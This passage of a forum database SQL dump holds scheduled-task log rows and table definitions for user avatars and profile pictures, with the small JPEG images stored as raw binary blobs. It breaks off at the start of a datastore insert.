'digestdaily', 1453630993, '', 1), (678, 'subscriptions', 1453630993, '', 1), (679, 'digestdaily', 1453706118, '', 1), (680, 'subscriptions', 1453706119, '', 1), (681, 'digestweekly', 1453706146, '', 1), (682, 'digestdaily', 1453797180, '', 1), (683, 'subscriptions', 1453797187, '', 1), (684, 'digestdaily', 1453891214, '', 1), (685, 'subscriptions', 1453891234, '', 1), (686, 'digestdaily', 1453960219, '', 1), (687, 'subscriptions', 1453960308, '', 1), (688, 'digestdaily', 1454059196, '', 1), (689, 'subscriptions', 1454059233, '', 1), (690, 'digestdaily', 1454152056, '', 1), (691, 'subscriptions', 1454152083, '', 1), (692, 'digestdaily', 1454229642, '', 1), (693, 'subscriptions', 1454229741, '', 1), (694, 'digestdaily', 1454307183, '', 1), (695, 'subscriptions', 1454307450, '', 1), (696, 'digestweekly', 1454311721, '', 1), (697, 'digestdaily', 1454411227, '', 1), (698, 'subscriptions', 1454411778, '', 1), (699, 'digestdaily', 1454481075, '', 1), (700, 'subscriptions', 1454481096, '', 1), (701, 'digestdaily', 1454564500, '', 1), (702, 'subscriptions', 1454564537, '', 1), (703, 'digestdaily', 1454657359, '', 1), (704, 'subscriptions', 1454657372, '', 1), (705, 'digestdaily', 1454737164, '', 1), (706, 'subscriptions', 1454737168, '', 1), (707, 'digestdaily', 1454829137, '', 1), (708, 'subscriptions', 1454829150, '', 1), (709, 'digestdaily', 1454912975, '', 1), (710, 'subscriptions', 1454912986, '', 1), (711, 'digestweekly', 1454913000, '', 1), (712, 'digestdaily', 1454995159, '', 1), (713, 'subscriptions', 1454995167, '', 1), (714, 'digestdaily', 1455087550, '', 1), (715, 'subscriptions', 1455087655, '', 1), (716, 'digestdaily', 1455183527, '', 1), (717, 'subscriptions', 1455183657, '', 1), (718, 'digestdaily', 1455257688, '', 1), (719, 'subscriptions', 1455257695, '', 1), (720, 'digestdaily', 1455362531, '', 1), (721, 'subscriptions', 1455362578, '', 1), (722, 'digestdaily', 1455433010, '', 1), (723, 'subscriptions', 1455433010, '', 1), (724, 'digestdaily', 1455522655, '', 1), (725, 'subscriptions', 1455522726, '', 1), (726, 'digestweekly', 1455523020, '', 1), (727, 'digestdaily', 1455601120, '', 1), (728, 'subscriptions', 1455601132, '', 1), (729, 'digestdaily', 1455697079, '', 1), (730, 'subscriptions', 1455697101, '', 1), (731, 'digestdaily', 1455773044, '', 1), (732, 'subscriptions', 1455773062, '', 1), (733, 'digestdaily', 1455859370, '', 1), (734, 'subscriptions', 1455859495, '', 1), (735, 'birthday', 1455948766, 'azizjon', 1), (736, 'digestdaily', 1455948770, '', 1), (737, 'subscriptions', 1455948772, '', 1), (738, 'digestdaily', 1456045395, '', 1), (739, 'subscriptions', 1456045406, '', 1), (740, 'digestdaily', 1456119871, '', 1), (741, 'subscriptions', 1456119885, '', 1), (742, 'digestweekly', 1456121234, '', 1), (743, 'digestdaily', 1456208825, '', 1), (744, 'subscriptions', 1456208832, '', 1), (745, 'digestdaily', 1456298322, '', 1), (746, 'subscriptions', 1456299093, '', 1), (747, 'digestdaily', 1456384367, '', 1), (748, 'subscriptions', 1456385649, '', 1), (749, 'digestdaily', 1456465502, '', 1), (750, 'subscriptions', 1456465691, '', 1), (751, 'digestdaily', 1456556703, '', 1), (752, 'subscriptions', 1456557679, '', 1), (753, 'digestdaily', 1456648473, '', 1), (754, 'subscriptions', 1456648483, '', 1), (755, 'digestdaily', 1456726865, '', 1), (756, 'subscriptions', 1456726880, '', 1), (757, 'digestweekly', 1456727333, '', 1), (758, 'digestdaily', 1456816810, '', 1), (759, 'subscriptions', 1456816824, '', 1), (760, 'digestdaily', 1456896816, '', 1), (761, 'subscriptions', 1456896816, '', 1), (762, 'digestdaily', 1456984007, '', 1), (763, 'subscriptions', 1456984011, '', 1), (764, 'digestdaily', 1457085138, '', 1), (765, 'subscriptions', 1457086170, '', 1), (766, 'digestdaily', 1457159789, '', 1), (767, 'subscriptions', 1457159818, '', 1), (768, 'digestdaily', 1457267854, '', 1), (769, 'subscriptions', 1457267857, '', 1), (770, 'digestdaily', 1457334641, '', 1), (771, 'subscriptions', 1457334650, '', 1), (772, 'digestweekly', 1457342456, '', 1), (773, 'digestdaily', 1457429346, '', 1), (774, 'subscriptions', 1457429363, '', 1), (775, 'digestdaily', 1457505521, '', 1), (776, 'subscriptions', 1457505543, '', 1), (777, 'digestdaily', 1457592868, '', 1), (778, 'subscriptions', 1457593099, '', 1), (779, 'digestdaily', 1457679407, '', 1), (780, 'subscriptions', 1457679409, '', 1), (781, 'digestdaily', 1457759007, '', 1), (782, 'subscriptions', 1457759095, '', 1), (783, 'digestdaily', 1457847070, '', 1), (784, 'subscriptions', 1457847079, '', 1), (785, 'digestdaily', 1457935723, '', 1), (786, 'subscriptions', 1457935984, '', 1), (787, 'digestweekly', 1457936010, '', 1), (788, 'digestdaily', 1458023063, '', 1), (789, 'subscriptions', 1458023072, '', 1), (790, 'digestdaily', 1458113976, '', 1), (791, 'subscriptions', 1458114082, '', 1), (792, 'digestdaily', 1458201277, '', 1), (793, 'subscriptions', 1458208168, '', 1), (794, 'digestdaily', 1458279186, '', 1), (795, 'subscriptions', 1458279244, '', 1), (796, 'digestdaily', 1458374728, '', 1), (797, 'subscriptions', 1458374738, '', 1), (798, 'digestdaily', 1458459324, '', 1), (799, 'subscriptions', 1458459336, '', 1), (800, 'digestdaily', 1458550480, '', 1), (801, 'subscriptions', 1458550570, '', 1), (802, 'digestweekly', 1458550744, '', 1), (803, 'digestdaily', 1458626439, '', 1), (804, 'subscriptions', 1458626439, '', 1), (805, 'digestdaily', 1458718609, '', 1), (806, 'subscriptions', 1458721718, '', 1), (807, 'digestdaily', 1458796956, '', 1), (808, 'subscriptions', 1458797000, '', 1), (809, 'digestdaily', 1458895362, '', 1), (810, 'subscriptions', 1458895370, '', 1), (811, 'digestdaily', 1458969384, '', 1), (812, 'subscriptions', 1458969385, '', 1), (813, 'digestdaily', 1459075806, '', 1), (814, 'subscriptions', 1459075809, '', 1), (815, 'digestdaily', 1459158163, '', 1), (816, 'subscriptions', 1459158200, '', 1), (817, 'digestweekly', 1459166460, '', 1), (818, 'digestdaily', 1459237852, '', 1), (819, 'subscriptions', 1459240095, '', 1), (820, 'digestdaily', 1459320391, '', 1), (821, 'subscriptions', 1459320405, '', 1), (822, 'digestdaily', 1459400319, '', 1), (823, 'subscriptions', 1459400363, '', 1), (824, 'digestdaily', 1459493572, '', 1), (825, 'subscriptions', 1459496301, '', 1), (826, 'digestdaily', 1459576702, '', 1), (827, 'subscriptions', 1459576710, '', 1), (828, 'digestdaily', 1459663410, '', 1), (829, 'subscriptions', 1459670317, '', 1), (830, 'digestdaily', 1459748462, '', 1), (831, 'subscriptions', 1459748470, '', 1), (832, 'digestweekly', 1459748622, '', 1), (833, 'digestdaily', 1459832413, '', 1), (834, 'subscriptions', 1459834765, '', 1), (835, 'digestdaily', 1459921438, '', 1), (836, 'subscriptions', 1459921442, '', 1), (837, 'digestdaily', 1460006500, '', 1), (838, 'subscriptions', 1460006513, '', 1), (839, 'digestdaily', 1460114942, '', 1), (840, 'subscriptions', 1460114949, '', 1), (841, 'digestdaily', 1460192857, '', 1), (842, 'subscriptions', 1460192870, '', 1), (843, 'digestdaily', 1460275616, '', 1), (844, 'subscriptions', 1460277414, '', 1), (845, 'digestdaily', 1460362382, '', 1), (846, 'subscriptions', 1460365976, '', 1), (847, 'digestweekly', 1460366165, '', 1), (848, 'digestdaily', 1460460111, '', 1), (849, 'subscriptions', 1460462866, '', 1), (850, 'digestdaily', 1460524301, '', 1), (851, 'subscriptions', 1460525446, '', 1), (852, 'digestdaily', 1460618280, '', 1), (853, 'subscriptions', 1460618540, '', 1), (854, 'digestdaily', 1460702986, '', 1), (855, 'subscriptions', 1460703049, '', 1), (856, 'digestdaily', 1460797127, '', 1), (857, 'subscriptions', 1460799019, '', 1), (858, 'digestdaily', 1460869835, '', 1), (859, 'subscriptions', 1460869841, '', 1), (860, 'digestdaily', 1460982681, '', 1), (861, 'subscriptions', 1460984581, '', 1), (862, 'digestweekly', 1460986956, '', 1), (863, 'digestdaily', 1461054980, '', 1), (864, 'subscriptions', 1461055647, '', 1), (865, 'digestdaily', 1461134989, '', 1), (866, 'subscriptions', 1461135003, '', 1), (867, 'digestdaily', 1461237245, '', 1), (868, 'subscriptions', 1461237249, '', 1), (869, 'digestdaily', 1461313567, '', 1), (870, 'subscriptions', 1461316529, '', 1), (871, 'digestdaily', 1461400918, '', 1), (872, 'subscriptions', 1461400923, '', 1), (873, 'digestdaily', 1461486903, '', 1), (874, 'subscriptions', 1461486948, '', 1), (875, 'digestdaily', 1461565578, '', 1), (876, 'subscriptions', 1461565639, '', 1), (877, 'digestweekly', 1461565664, '', 1), (878, 'digestdaily', 1461658044, '', 1), (879, 'subscriptions', 1461658055, '', 1), (880, 'digestdaily', 1461744556, '', 1), (881, 'subscriptions', 1461744577, '', 1), (882, 'digestdaily', 1461844590, '', 1), (883, 'subscriptions', 1461850217, '', 1), (884, 'digestdaily', 1461903139, '', 1), (885, 'subscriptions', 1461903159, '', 1), (886, 'digestdaily', 1462035270, '', 1), (887, 'subscriptions', 1462035285, '', 1), (888, 'digestdaily', 1462085103, '', 1), (889, 'subscriptions', 1462085982, '', 1), (890, 'digestdaily', 1462182923, '', 1), (891, 'subscriptions', 1462182931, '', 1), (892, 'digestweekly', 1462182936, '', 1), (893, 'digestdaily', 1462256182, '', 1), (894, 'subscriptions', 1462260418, '', 1), (895, 'digestdaily', 1462338079, '', 1), (896, 'subscriptions', 1462338083, '', 1), (897, 'digestdaily', 1462421693, '', 1), (898, 'subscriptions', 1462422469, '', 1), (899, 'digestdaily', 1462515495, '', 1), (900, 'subscriptions', 1462515511, '', 1), (901, 'digestdaily', 1462605693, '', 1), (902, 'subscriptions', 1462605714, '', 1), (903, 'digestdaily', 1462702929, '', 1), (904, 'subscriptions', 1462702996, '', 1), (905, 'digestdaily', 1462768662, '', 1), (906, 'subscriptions', 1462768667, '', 1), (907, 'digestweekly', 1462778201, '', 1), (908, 'digestdaily', 1462855570, '', 1), (909, 'subscriptions', 1462855576, '', 1), (910, 'digestdaily', 1462956582, '', 1), (911, 'subscriptions', 1462956590, '', 1), (912, 'digestdaily', 1463040328, '', 1), (913, 'subscriptions', 1463040710, '', 1), (914, 'digestdaily', 1463121242, '', 1), (915, 'subscriptions', 1463121256, '', 1), (916, 'digestdaily', 1463230213, '', 1), (917, 'subscriptions', 1463236926, '', 1), (918, 'digestdaily', 1463320960, '', 1), (919, 'subscriptions', 1463322096, '', 1), (920, 'digestdaily', 1463379085, '', 1), (921, 'subscriptions', 1463380209, '', 1), (922, 'digestweekly', 1463394348, '', 1), (923, 'digestdaily', 1463484904, '', 1), (924, 'subscriptions', 1463485085, '', 1), (925, 'digestdaily', 1463545757, '', 1), (926, 'subscriptions', 1463545859, '', 1), (927, 'digestdaily', 1463643481, '', 1), (928, 'subscriptions', 1463643488, '', 1), (929, 'digestdaily', 1463726020, '', 1), (930, 'subscriptions', 1463726026, '', 1), (931, 'digestdaily', 1463810669, '', 1), (932, 'subscriptions', 1463810699, '', 1), (933, 'digestdaily', 1463892209, '', 1), (934, 'subscriptions', 1463892217, '', 1), (935, 'digestdaily', 1463985020, '', 1), (936, 'subscriptions', 1463985327, '', 1), (937, 'digestweekly', 1463985474, '', 1), (938, 'digestdaily', 1464069213, '', 1), (939, 'subscriptions', 1464071207, '', 1), (940, 'digestdaily', 1464158033, '', 1), (941, 'subscriptions', 1464158053, '', 1), (942, 'digestdaily', 1464249376, '', 1), (943, 'subscriptions', 1464249381, '', 1), (944, 'digestdaily', 1464330808, '', 1), (945, 'subscriptions', 1464330901, '', 1), (946, 'digestdaily', 1464432787, '', 1), (947, 'subscriptions', 1464432794, '', 1), (948, 'digestdaily', 1464500951, '', 1), (949, 'subscriptions', 1464501098, '', 1), (950, 'digestdaily', 1464582178, '', 1), (951, 'subscriptions', 1464582183, '', 1), (952, 'digestweekly', 1464583974, '', 1), (953, 'digestdaily', 1464673309, '', 1), (954, 'subscriptions', 1464673312, '', 1), (955, 'digestdaily', 1464756113, '', 1), (956, 'subscriptions', 1464756453, '', 1), (957, 'digestdaily', 1464849402, '', 1), (958, 'subscriptions', 1464849414, '', 1), (959, 'digestdaily', 1464926665, '', 1), (960, 'subscriptions', 1464926684, '', 1), (961, 'digestdaily', 1465015386, '', 1), (962, 'subscriptions', 1465015405, '', 1), (963, 'digestdaily', 1465101226, '', 1), (964, 'subscriptions', 1465106105, '', 1), (965, 'digestdaily', 1465190904, '', 1), (966, 'subscriptions', 1465190945, '', 1), (967, 'digestweekly', 1465194412, '', 1); DROP TABLE IF EXISTS `customavatar`; CREATE TABLE `customavatar` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `filedata` mediumblob, `dateline` int(10) unsigned NOT NULL DEFAULT '0', `filename` varchar(100) NOT NULL DEFAULT '', `visible` smallint(6) NOT NULL DEFAULT '1', `filesize` int(10) unsigned NOT NULL DEFAULT '0', `width` smallint(5) unsigned NOT NULL DEFAULT '0', `height` smallint(5) unsigned NOT NULL DEFAULT '0', `filedata_thumb` mediumblob, `width_thumb` int(10) unsigned NOT NULL DEFAULT '0', `height_thumb` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`userid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `customavatar` (`userid`, `filedata`, `dateline`, `filename`, `visible`, `filesize`, `width`, `height`, `filedata_thumb`, `width_thumb`, `height_thumb`) VALUES (173, 'ÿØÿà\0JFIF\0\0`\0`\0\0ÿá\0\"Exif\0\0MM\0*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÛ\0C\0 \n\n\r\n\n  \r  ÿÛ\0C  ÿÀ\0\0P\0J\"\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0 \n ÿÄ\0µ\0\0\0}\0!1AQa\"q2‘¡#B±ÁRÑð$3br‚ \n\Z%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ\0\0\0\0\0\0\0\0 \n ÿÄ\0µ\0\0w\0!1AQaq\"2B‘¡±Á #3RðbrÑ\n$4á%ñ\Z&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚâãäåæçèéêòóôõö÷øùúÿÚ\0 \0\0?\0ü1i˜{š±a>Æ9?xU]ŒÍÑ…X‚ªzôàמ–=®}nhÇs¼(ZÛÐ\'i_in[ÍsÖ6ï¼µªúì>f‘|É›ˆ¡\\ý{V×DvQ­gÍ\'dwV:+5¶æû¿Zž+(ÌyUÎÞ§Ò¼ƒYø‘¬kWVîEVZÛ±}ÎFHÏp{ÒØü?ñ7ˆl¼ë=#UxväJ‘¾Ü“×8Áô¬¾«mg$ŽèæÑ”¹hR”¿¯$Ïqðƃ\rÞ§•þR{šµâï ,R?Ùÿ\0y·†+ÊŸzùþëWñW&Û5æ©`ËÑ\'/ƒöd?†@¯^øyñ†òúm7ÄV‹g¨4^e­Â E~„ ž>]ãÃÇl0yëájÁûH;£ÓÁfØzÉЫ yÿ\0Z|Ê·vßgVVÜ¥kÙ÷·­tÞ\'Õb¹vhÔ-É­s­’ßpÖ”ïmH­È®qS@¡ Ò™ß+§n=ªy£¡_Æ¡ŠÉƒýìŠì>_ØÉ²ÍŒ«i!TdŸJåõ\rZMFîIOÌfQÙW=t~&µ}?ÃÑœö‰dúu?Λ xjÖÖ溈Í&3-÷Nz“ôâœg®f*ô¦Ú¢½YÂÝbßž/³¸Ô4Û}B)(ŽwÚ‰ÏßôÈ÷{WÐZÿ\0Ç]7\\Ô,´H!šúE‚]BFýÝ  î\n[\0°Ïl\rx/ˆûJ1Ê!h[lcnÝßʽ[Á¿´µ§‡þÚh:o„t[yV0n¯.¢Ëu!ÎNàr02qŽ€ôó1Ô}¤•HÆï×O_øcè²Áa©Ë\r9¨§­ùnß’µ­~ïäu_$`\"õÙ€ÊqÔzÿ\01œù|\Zc]ø:]&}«s¡Îmâ˜\r»YH1È=2\näúf¯Eñ‚ük‘­ËAŽíî±!ÚõèOáŒzV…ìpê77—–ï ‘]J¤´g*Ä\"‚AüGåJŒgM(Ë׿vâñ13s¥£Õ=:=WÝmeµi58ã—îùˆ©þz¡7²g«U¹­Î×îõÈú“ý*±0gø«¶:Ÿ;+õ2màI$ÛïZ6:Î3ó+Œ”‰¥þû¯$ðq]Ï‚|)çù¹Îvç5jÊ\nìÖJVGâñolºjË·jïl°8RH\0œqÁÎ<~j±Il°É%™®•ˆÜvñŽƒ¨Á³Óú—ÆŸƒ×Çᦩ¥Ân-l\'ßq\Zw|¡úò œ÷‡\\W!ñ#༟\nþ ézæ­q$:·‰.›ìV¡vì·Ž<–\'ý¶•\0û­œô°ÅR©Ê”µm«yïùjnèÖ¥:’qÚ)ߢZ/ÇdyŽ¥|×÷·u8?ãE­áÆìôÁöªr\Z‚Åï»¨ëŠ ›el¶8è+Ôå²>mUn\\ì¿%ÏÚâÀþÖµ|!â9¼6ò#y“[È>dVÆ8#8Î;þ•ÎÚËäËÜV•ŒùF²}jeÕŽê2j\\éêz»Zx›Gó m­æ\"~eÀþ•žt1Ÿº¿rš³q¦ëá­v°Ú|Ä#åaŽþþ†»í(ý$üsò¸ìzt\'\nªòÜÇ’å,­åšF db}\0Ítÿ\0\r¼}©k\Z;6Ÿ§®Ð¼Éq/“vl\\7Š_ÎðÅÚ™¥Ø€RêQÓ<ê.Ÿu4ÑYé¶žtÁ21Àã\'#$óÉ\0U(ÆpÔÖ8ŽJ«µ¿~ºö>ŽøûGÚÁg£xž{8Dd”ÝóÅ*0ÚS)G\r‰ž+.ž´’Z­ítíò±Sö~ðvƒð×À\Zåï‹a·‡VÍóœab‡k\r§ý§î3¸(ÀõðŸ\\Á­ø®úâËþ=ç¤_—hÁ9È9 v±ñÆSxÃ^‘¤oôxܬj¿u±ÆïƲ㱡ݻo¯_FPœªÍë.óù¦2–&, B•ìþÔŸvÊrZ6>eÍ68 ¹Y¶÷榞ãÈC|µ\nMæž\0äWZEüñŽkÕtk†—አ&_2h˲“ÎsŸÃ•x6¯vnî¼ÆûÛB¯°+¤‡Ä×RéñªÌÁvŒûV5°ÊJ-nŽŒh¨Êi­\Z²FåÆf‘öÿ\08ôç¥Ig¨,ˆÛ¾QL¸_&B½wà\nš;HÚ<†n¼â·—™æÑ»ÑîaûTy^gµQ¸×vÖlôæ®]\\‹wÂýÑÞ³înâFÁù³ZCcž­¯æ^ðæ°Ö×õï]¢x°ì/jà4ò#˜{WF„”_”ô¥R)»›aêÊ1²gÿÙ', 1451334472, 'images(2).jpg', 1, 2623, 74, 80, 'ÿØÿà\0JFIF\0\0`\0`\0\0ÿá\0\"Exif\0\0MM\0*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÛ\0C\0 \n\n\r\n\n  \r  ÿÛ\0C  ÿÀ\0\0P\0J\"\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0 \n ÿÄ\0µ\0\0\0}\0!1AQa\"q2‘¡#B±ÁRÑð$3br‚ \n\Z%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ\0\0\0\0\0\0\0\0 \n ÿÄ\0µ\0\0w\0!1AQaq\"2B‘¡±Á #3RðbrÑ\n$4á%ñ\Z&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚâãäåæçèéêòóôõö÷øùúÿÚ\0 \0\0?\0ü1i˜{š±a>Æ9?xU]ŒÍÑ…X‚ªzôàמ–=®}nhÇs¼(ZÛÐ\'i_in[ÍsÖ6ï¼µªúì>f‘|É›ˆ¡\\ý{V×DvQ­gÍ\'dwV:+5¶æû¿Zž+(ÌyUÎÞ§Ò¼ƒYø‘¬kWVîEVZÛ±}ÎFHÏp{ÒØü?ñ7ˆl¼ë=#UxväJ‘¾Ü“×8Áô¬¾«mg$ŽèæÑ”¹hR”¿¯$Ïqðƃ\rÞ§•þR{šµâï ,R?Ùÿ\0y·†+ÊŸzùþëWñW&Û5æ©`ËÑ\'/ƒöd?†@¯^øyñ†òúm7ÄV‹g¨4^e­Â E~„ ž>]ãÃÇl0yëájÁûH;£ÓÁfØzÉЫ yÿ\0Z|Ê·vßgVVÜ¥kÙ÷·­tÞ\'Õb¹vhÔ-É­s­’ßpÖ”ïmH­È®qS@¡ Ò™ß+§n=ªy£¡_Æ¡ŠÉƒýìŠì>_ØÉ²ÍŒ«i!TdŸJåõ\rZMFîIOÌfQÙW=t~&µ}?ÃÑœö‰dúu?Λ xjÖÖ溈Í&3-÷Nz“ôâœg®f*ô¦Ú¢½YÂÝbßž/³¸Ô4Û}B)(ŽwÚ‰ÏßôÈ÷{WÐZÿ\0Ç]7\\Ô,´H!šúE‚]BFýÝ  î\n[\0°Ïl\rx/ˆûJ1Ê!h[lcnÝßʽ[Á¿´µ§‡þÚh:o„t[yV0n¯.¢Ëu!ÎNàr02qŽ€ôó1Ô}¤•HÆï×O_øcè²Áa©Ë\r9¨§­ùnß’µ­~ïäu_$`\"õÙ€ÊqÔzÿ\01œù|\Zc]ø:]&}«s¡Îmâ˜\r»YH1È=2\näúf¯Eñ‚ük‘­ËAŽíî±!ÚõèOáŒzV…ìpê77—–ï ‘]J¤´g*Ä\"‚AüGåJŒgM(Ë׿vâñ13s¥£Õ=:=WÝmeµi58ã—îùˆ©þz¡7²g«U¹­Î×îõÈú“ý*±0gø«¶:Ÿ;+õ2màI$ÛïZ6:Î3ó+Œ”‰¥þû¯$ðq]Ï‚|)çù¹Îvç5jÊ\nìÖJVGâñolºjË·jïl°8RH\0œqÁÎ<~j±Il°É%™®•ˆÜvñŽƒ¨Á³Óú—ÆŸƒ×Çᦩ¥Ân-l\'ßq\Zw|¡úò œ÷‡\\W!ñ#༟\nþ ézæ­q$:·‰.›ìV¡vì·Ž<–\'ý¶•\0û­œô°ÅR©Ê”µm«yïùjnèÖ¥:’qÚ)ߢZ/ÇdyŽ¥|×÷·u8?ãE­áÆìôÁöªr\Z‚Åï»¨ëŠ ›el¶8è+Ôå²>mUn\\ì¿%ÏÚâÀþÖµ|!â9¼6ò#y“[È>dVÆ8#8Î;þ•ÎÚËäËÜV•ŒùF²}jeÕŽê2j\\éêz»Zx›Gó m­æ\"~eÀþ•žt1Ÿº¿rš³q¦ëá­v°Ú|Ä#åaŽþþ†»í(ý$üsò¸ìzt\'\nªòÜÇ’å,­åšF db}\0Ítÿ\0\r¼}©k\Z;6Ÿ§®Ð¼Éq/“vl\\7Š_ÎðÅÚ™¥Ø€RêQÓ<ê.Ÿu4ÑYé¶žtÁ21Àã\'#$óÉ\0U(ÆpÔÖ8ŽJ«µ¿~ºö>ŽøûGÚÁg£xž{8Dd”ÝóÅ*0ÚS)G\r‰ž+.ž´’Z­ítíò±Sö~ðvƒð×À\Zåï‹a·‡VÍóœab‡k\r§ý§î3¸(ÀõðŸ\\Á­ø®úâËþ=ç¤_—hÁ9È9 v±ñÆSxÃ^‘¤oôxܬj¿u±ÆïƲ㱡ݻo¯_FPœªÍë.óù¦2–&, B•ìþÔŸvÊrZ6>eÍ68 ¹Y¶÷榞ãÈC|µ\nMæž\0äWZEüñŽkÕtk†—አ&_2h˲“ÎsŸÃ•x6¯vnî¼ÆûÛB¯°+¤‡Ä×RéñªÌÁvŒûV5°ÊJ-nŽŒh¨Êi­\Z²FåÆf‘öÿ\08ôç¥Ig¨,ˆÛ¾QL¸_&B½wà\nš;HÚ<†n¼â·—™æÑ»ÑîaûTy^gµQ¸×vÖlôæ®]\\‹wÂýÑÞ³înâFÁù³ZCcž­¯æ^ðæ°Ö×õï]¢x°ì/jà4ò#˜{WF„”_”ô¥R)»›aêÊ1²gÿÙ', 74, 80); DROP TABLE IF EXISTS `customprofilepic`; CREATE TABLE `customprofilepic` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `filedata` mediumblob, `dateline` int(10) unsigned NOT NULL DEFAULT '0', `filename` varchar(100) NOT NULL DEFAULT '', `visible` smallint(6) NOT NULL DEFAULT '1', `filesize` int(10) unsigned NOT NULL DEFAULT '0', `width` smallint(5) unsigned NOT NULL DEFAULT '0', `height` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`userid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `customprofilepic` (`userid`, `filedata`, `dateline`, `filename`, `visible`, `filesize`, `width`, `height`) VALUES (181, 'ÿØÿà\0JFIF\0\0–\0–\0\0ÿÛ\0C\0  \n \n\r\r \r\Z! #\'2*#%/%+;,/35888!*=A<6A2785ÿÛ\0C \n\n\r \r5$$55555555555555555555555555555555555555555555555555ÿÀ\0\0d\0d\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÄ\0<\0\0\0\0\0\0\0!1AQaq\"2‘¡Á#$BRbr¢±Âðñ3‚’²ÑÿÄ\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0!1AQÿÚ\0 \0\0?\0¼h\nƒ(!$¨€2h1KÈRw’ SÐŽFƒá}#&ƒç¬ #Céï Í+J½Ò\rT@PUÒ÷Üëq€2&¼>æ+do¯¼þ”ö“ƒ°_}eë‚ž-´;\0<Ïí>¨©4°q4G JGA@1Œ\n\r9pJÐU^‰ÁËj_èƒjöÛåLÉÞiÄ’’AÁµùŸ-ê±dµòæc:­ÖgþPO$¹Ø{ÈõÇ\\YŠiJ‚Ò’´‘,zÎz(`güÕëŸk¾ÃºÁfTgR¶Ÿ@Z1YRµsÔ5C…µa/!.Œ|ÌWN>#Æ<æ®¶÷ Í u§RR¤«¨­z4ô®wKêÕé;´…. Šüîž(Ϻœö^>5ÊÌUÃP©A *QÀ$öPQñõ+zËj&}ÁxµZ·™lò I$÷’AòÅjM:·kÝÁp­±JôiÁö—“ŠuÓgõ\'ÿ\0*.o×!ªYbéfyÒÓ{Ž´“‡\0ÎAÝøÖ¥.%+JÅlCmaÅÀšŽ ›$sáÄ}k<•rlŸZ+Wé}Ù$úô\rÖŸQ?ê {+óÁÏx5€ó@¥µ Á²èî¶w]}>®ƒÞ®øw¨9™7#Ã’ÓD§Ö0Aü£”¤)G\0PXp-É‹cf*\0.-öQ‘Õe`ý+yœO®Ž¬=±[Œ½Jrc¾•àAOó\"ƒš© AãA‚*\r‹5Þf¼±q·8Z²E©= ŽY§umK§âÜ¡¬)·Ð â…uIï\"ª9Ëk×wn›F¸!j%¨dGi\'ò„Ž?ÄME$Ð_{».~ˆK¬©PžS#?§CþÄyU‰U¾Ónâï­¥ŽZˆtžñï|ÉøT!z$E¼°(¦kTâ,( ¹ÕG¥n@馘ûCUØà$o Ipw dgçW—S/zæ­͵»½¢Tx&Ceì=‘Á åWivÛ=Ô8×\ZqHXì àÐC6¾ƒ×ÑŒ§áTX[\ZÕª°ê²%¯®*<w¡óåð …Û•Û^Ñg8¤á©»²[#¨#ø‚ª¯EAjlÊZì»9Ô$ ©•ûö÷>dUB 6÷Qqåek;Ê\'‰$Ó/oˆ–ÔªÈ$ò†V®Bµâ,ØV§%ߤ ‚±èXÈéÍD|‡Æ±nªÔ¨\n\nÃk:N]à³÷‰ŠBG¼?_ˆëÝáAÏÒâ9ò…\'ÙÏAñ+ˆ5FÌw›* pz(sEÌ£^ìØHàréaX\nsó:ÂødöqŸú$Ù[‰5p<ÛÃvýŽÍe¾MÑ(P=_Ò( î ÃÖ G ÓÁ;¤´ìÍ]{j3`¥”ç\\Ç\'©þúÔ´te¾ È ÃŠÆX@BÜ*\ršƒ$)%$\r;¯¶L´úi¶vËÑÎT¦ÅmþïhùÐS“lò!-[©*@ ÐÞ(WA úóêz„CyÍÈ×6—\rÜòöÆ|•ºj?µÒÓËfJ n6¢•Â8\Zº\'¦Þc±¡í±Ã£ñ2ß’SÜ“ñ\n \\]Õ VëAK=¦†%£.ººzPË%\r7ÜPöP;ÏÒ è\r\'¤áé;_«Eî/׈ÁYéà”ô@P\nšŸg–ÝFKÉ©(óu´‚ûï:\n¾ý±›³\nR˜ŽÜ´t[gþ\'ášé»<ºBs*‡)’\ræT1ò ô™¥$]ä‰ f[r–¦c|8¾ªF æGnh$šÙmþò¸ènÝ%¶l6ߦO£á’I;ØæI4š_aÌB vðúN8ú:ø¨ý>4Œ­‘S\r°Ê9!ƒf€ (\n€ (\n€ (\n€ (\nÿÙ', 1443048578, 'retina.jpeg', 1, 2637, 100, 100); DROP TABLE IF EXISTS `datastore`; CREATE TABLE `datastore` ( `title` char(50) NOT NULL DEFAULT '', `data` mediumtext, `unserialize` smallint(6) NOT NULL DEFAULT '0', PRIMARY KEY (`title`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES ('attachmentcache', 